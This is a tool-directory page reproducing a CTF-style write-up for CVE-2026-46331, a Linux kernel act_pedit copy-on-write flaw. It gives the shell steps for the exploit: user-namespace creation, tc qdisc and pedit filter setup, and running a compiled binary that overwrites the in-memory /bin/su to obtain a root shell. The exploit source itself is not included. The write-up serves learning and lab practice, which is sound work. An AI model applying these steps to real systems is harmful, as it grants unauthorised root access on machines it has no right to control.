Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-46331-pedit-cow — Write-up and exploitation steps for the pedit COW vulnerability (CVE-2026-46331) | Kitploit
Tools/GitHubGitHub/marwahhadi/cve-2026-46331-pedit-cow
Privilege EscalationExploitationCTFLearning & EducationBinary Exploitation
GitHubmarwahhadi/cve-2026-46331-pedit-cow

CVE-2026-46331-pedit-cow

Write-up and exploitation steps for the pedit COW vulnerability (CVE-2026-46331)

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
52 months agoNot yet reviewed

CVE-2026-46331-pedit-cow

Write-up and exploitation steps for the pedit COW vulnerability (CVE-2026-46331).

Overview

This challenge demonstrates pedit COW, a Linux kernel flaw in the traffic-control subsystem's packet-editing action (act_pedit). The vulnerability allows an unprivileged user to overwrite an in-memory copy of a setuid-root binary, effectively gaining a root shell without ever touching the file on the disk.

Exploitation Steps

1. Initial Setup

The environment starts as an unprivileged user (karen).

id
cd ~/packet_edit_meme
make packet_edit_meme
  1. Privilege Escalation (Namespace Creation) Configuring traffic-control normally requires CAP_NET_ADMIN privileges, which an ordinary user lacks. I used unprivileged user namespaces to gain this capability.
unshare -r -n
  1. Configuring the Traffic-Control Action Inside the namespace, I configured the clsact qdisc and applied a filter to trigger the pedit action.

Clean up any existing configurations if needed

tc qdisc del dev lo clsact

Setup the qdisc and filter

tc qdisc add dev lo clsact
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64
  1. Executing the Exploit After setting up the environment, I exited the root shell and executed the exploit as an unprivileged user.
exit
./packet_edit_meme
  1. Final Result The exploit successfully overwrote the entry for /bin/su, providing an interactive root shell.
# cat /root/flag.txt

THM{YOUR_FLAG_HERE}

Download Tool